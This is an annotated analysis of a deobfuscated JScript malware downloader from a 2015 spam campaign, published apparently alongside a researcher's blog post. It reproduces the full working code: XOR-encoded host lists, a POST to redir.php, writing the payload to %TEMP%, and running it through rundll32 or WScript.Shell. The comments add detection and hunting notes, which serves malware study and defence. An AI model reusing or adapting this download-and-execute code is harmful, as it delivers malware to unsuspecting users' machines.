bartblaze

out2.js

Nov 10th, 2015
  1. Deobfuscated JS file. Related blog post: http://bartblaze.blogspot.com/2015/11/a-quick-look-at-signed-spam-campaign.html
  2.  
  // Analyst note: implicit global (assigned without var). Its value is concatenated into
  // the "jndj" field of every POST body built in kTEIfdmieLe(). It looks like a
  // campaign or build tag, but nothing in this script shows how the server uses it.
  3. kTEIfdmieLe8 = "au0911";
  4.  
  // Analyst note: one-line factory around the Windows Script Host ActiveXObject
  // constructor, so the constructor name appears only once in the script.
  //   kTEIfdmieLe6 - ProgID string of the COM object to create; the callers in this
  //                  sample pass "WScript.Shell", "MSXML2.XMLHTTP" and "ADODB.Stream".
  //   returns      - the newly created COM object.
  5. function kTEIfdmieLe5(kTEIfdmieLe6) {
  6.     return new ActiveXObject(kTEIfdmieLe6)
  7. };
  8. //// r6JLy1ijVPK
  9. //// 9eoOj
  10.  
  11. //// b81c44zCnlGhKEGFeeq
  12. //// rMgXtx1jVd3fR2
  // Analyst note: download-and-execute routine of the sample.
  //   jhmpYYZvkuHWkW - text appended to the POST body. An empty string selects the
  //                    ".dll" / rundll32 branch; any other value selects the ".pdf" /
  //                    WScript.Shell.Run branch.
  //   returns        - nothing; the effects are a file written under %TEMP% and a
  //                    process launch.
  // For each entry of the "###"-separated table the routine XOR-decodes a host string,
  // sends a POST to http://<host>/redir.php and, when the answer is HTTP 200 with a body
  // larger than 5000 bytes, saves the body to disk and launches it. The loop stops at
  // the first host that delivers such a body. Both catch blocks are empty, so network
  // and launch errors are silent. The "////" lines carry random strings and appear to
  // be filler left over from the original obfuscation.
  13. function kTEIfdmieLe(jhmpYYZvkuHWkW) {
          // Table of host strings, each XOR-encoded with the repeating key assigned at
          // listing line 62. Nothing is stored in clear text, so a plain string search of
          // the script will not show the contacted hosts; decode offline to extract them.
  14.     var kTEIfdmieLe4 = '9\x1a\x06f\x277w5T(*#E~###7\x19\x1d\x7f!7\x18#(,hd###2\x1d\x04~;)q?*9, \x0f#861\x0b\x0d}"4\x18/5&J\x198Y\x14\x0b\x14, \x5c\x06HB\x04\x1f\x06\x00\x1dg\x00\x05\x05\x0c=)\x1f\x10\x0bY\x0b\x1d\x0e\x17cB###.\x0d\x02`3/y8?\x276@\x0b;:ip###.\x1d\x09w$.e%5%<!\x1dZ4+7UO###3\x0b\x11s<%c 1\x27,#\x09Z86=UO###\x13, A\x13I]\x16wa'.split("###");
  15. //// U2gGxa
  16. //// v5ziPM5Ffk
          // File extension of the dropped file; the pieces are concatenated so that ".dll"
          // and ".pdf" never appear as whole literals. qKLIFbykNgG is an implicit global.
  17.     if (jhmpYYZvkuHWkW == "") {
  18.         qKLIFbykNgG = "." + "d" + "l" + "l";
  19.     } else {
  20. //// vuh4k5cITe
  21. //// KGZT1FZBTij1b
  22.         qKLIFbykNgG = "." + "p" + "d" + "f";
  23.     };
          // One download attempt per table entry.
  24.     for (var kRIBOVzKPU = 0; kRIBOVzKPU < kTEIfdmieLe4.length; kRIBOVzKPU++) {
  25.         var veHnYKIWjraSp = kTEIfdmieLe5("WScript.Shell");
  26. //// nugznF3J0MgFJS6
  27. //// vAjJP
              // Drop path: %TEMP%\<random integer below 1e8><extension>. A purely numeric
              // file name with a .dll or .pdf extension directly under %TEMP% is a usable
              // hunting pattern for this sample.
  28.         sxyPxnzNV = veHnYKIWjraSp.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + qKLIFbykNgG;
              // Success flag (implicit global), set inside the response handler below.
  29.         bypLmkq = false;
  30.         kTEIfdmieLe0 = kTEIfdmieLe5("MSXML2.XMLHTTP");
  31.         kTEIfdmieLe0.onreadystatechange = function() {
                  // Only a completed request (readyState 4) with HTTP status 200 is processed.
  32.             if (4 == kTEIfdmieLe0.readyState && 200 == kTEIfdmieLe0.status) {
  33.                 var kTEIfdmieLe1 = kTEIfdmieLe5("ADODB.Stream");
                      // The comma expression opens the stream, sets type 1 (adTypeBinary) and
                      // writes the raw response body; only the last operand, size > 5000 bytes,
                      // decides the branch. Smaller answers are discarded.
  34.                 if (kTEIfdmieLe1.open(), kTEIfdmieLe1.type = 1, kTEIfdmieLe1.write(kTEIfdmieLe0.ResponseBody), 5e3 < kTEIfdmieLe1.size) {
  35.                     bypLmkq = true;
  36.                     kTEIfdmieLe1.position = 0;
                          // Save option 2 is adSaveCreateOverWrite: an existing file is replaced.
  37.                     kTEIfdmieLe1.saveToFile(sxyPxnzNV, 2);
  38.                     try {
  39.                         if (jhmpYYZvkuHWkW == "") {
                                  // DLL branch: the dropped file is loaded by rundll32 through its
                                  // DllRegisterServer export. Detection: a script host process
                                  // (e.g. wscript.exe) starting rundll32 on a file under %TEMP%.
  40.                             veHnYKIWjraSp.Exec("rundll32 " + sxyPxnzNV + ", " + "DllRegisterServer");
  41.                         } else {
                                  // PDF branch: Run(path, 1, 0) starts the file in a normal window
                                  // without waiting for it to exit. Presumably a decoy document;
                                  // the script itself does not confirm that.
  42.                             veHnYKIWjraSp.Run(sxyPxnzNV, 1, 0);
  43.                         };
  44.                     } catch (kTEIfdmieLe2) {
  45. //// uLwp7f7a4iYX4fySkVO
  46. //// AHd01oKSom
  47.                        
  48.                     };
  49. //// XEJSIvJ50CMlcrXQ8W
  50. //// l9CA25oIEjMlpDI5
  51.                 }
  52.                 kTEIfdmieLe1.close()
  53.             }
  54. //// vBJw1enjn3Wd7NMI
  55. //// FKMKp9Sj
  56.         };
  57.         try {
  58. //// 7bMQQ7rV
  59. //// 0DHAGjKxwXc0lyCHv
  60. //// KiU13559
  61. //// IaR517JKlqQjx2OsWqJs
                  // Repeating-key XOR: every character of the table entry is XORed with the
                  // key character at index MCwLh7, which wraps to 0 at the end of the key.
  62.             var jjxjYcRoh = 'zXE2rg6lzkenHtwd';
  63.             var ICJCJreUdAoEDtN = kTEIfdmieLe4[kRIBOVzKPU];
  64.             for (var byQIHsqp = "", MCwLh6 = 0, MCwLh7 = 0; MCwLh6 < ICJCJreUdAoEDtN.length; MCwLh6++) byQIHsqp += String.fromCharCode(ICJCJreUdAoEDtN.charCodeAt(MCwLh6) ^ jjxjYcRoh.charCodeAt(MCwLh7)), MCwLh7++, MCwLh7 == jjxjYcRoh.length && (MCwLh7 = 0);
                  // Request URL: plain HTTP, fixed path "/redir.php" on the decoded host.
  65.             kTEIfdmieLe7 = "http://" + byQIHsqp + "/redir" + "." + "p" + "h" + "p";
                  // Third argument false makes the request synchronous, so the success flag
                  // is only tested after send() has returned.
  66.             kTEIfdmieLe0.open("POST", kTEIfdmieLe7, false);
  67.             kTEIfdmieLe0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                  // Form body: "JreoOoOUJvvFay=<Math.random() value>&jndj=au0911" followed by the
                  // caller's suffix. The fixed parameter names are usable as a network signature.
  68.             kTEIfdmieLe0.send("JreoOoOUJvvFay=" + Math.random() + "&jndj=" + kTEIfdmieLe8 + jhmpYYZvkuHWkW);
  69.         } catch (kTEIfdmieLe3) {
  70.  
  71.         };
  72.  
              // Stop after the first host that returned a payload above the size threshold.
  73.         if (bypLmkq) {
  74.             break;
  75.         };
  76. //// hqp4kZQUxwE
  77. //// KYrOhQ
  78.     };
  79. };
  80. //// EQr7ksuiuwZdut45a
  81. //// jCStO3r
  82.  
  // Analyst note: the routine is run twice. The empty argument takes the ".dll" branch,
  // where the download is started through rundll32 and its DllRegisterServer export.
  // The second call appends "&ncm=sJzHYgdHnDZTwU" to the POST body and takes the ".pdf"
  // branch, where the saved file is opened with WScript.Shell.Run.
  83. kTEIfdmieLe("");
  84. kTEIfdmieLe("&ncm=sJzHYgdHnDZTwU");
  85. //// AEiSHdZq5
  86. //// nHsVUN2fzi